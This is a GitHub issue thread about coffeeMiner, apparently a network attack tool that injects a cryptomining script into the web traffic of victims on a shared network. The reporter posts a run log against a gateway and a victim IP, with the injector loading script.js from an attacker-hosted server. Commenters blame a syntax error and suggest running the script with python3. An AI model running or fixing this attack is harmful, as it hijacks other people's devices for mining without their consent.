-
Notifications
You must be signed in to change notification settings - Fork 281
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
injector.py error sintax #21
Comments
same issue when using nethunter armhf on my Android but when inside a vm on laptop no issues |
after further investigation i believe its a system link error. if you type on the other hand if you type so what this means if i am correct is its being ran with the python v1 | v2 instead of v3 as for a fix what i'm going to try is uninstall python v1 & v2 & v3 then re run install.sh |
hi ragekillen, hi all please help me |
Try running it as python3 injector.py |
hello,
when i run a coffeeminer get the following error:
root@kali:~/coffeeMiner# python3 coffeeMiner.py 192.168.0.1
gateway: 192.168.0.1
victims:
['192.168.0.4']
Loading script: injector.py http://192.168.0.10:8000/script.js
Script error: injector.py line 11: invalid syntax
Proxy server listening at http://0.0.0.0:8080
192.168.0.4:57793: clientconnect
192.168.0.4:57795: clientconnect
192.168.0.4:57800: clientconnect
192.168.0.4:57801: clientconnect
and not inject the script.js
can you help me plz ?
The text was updated successfully, but these errors were encountered: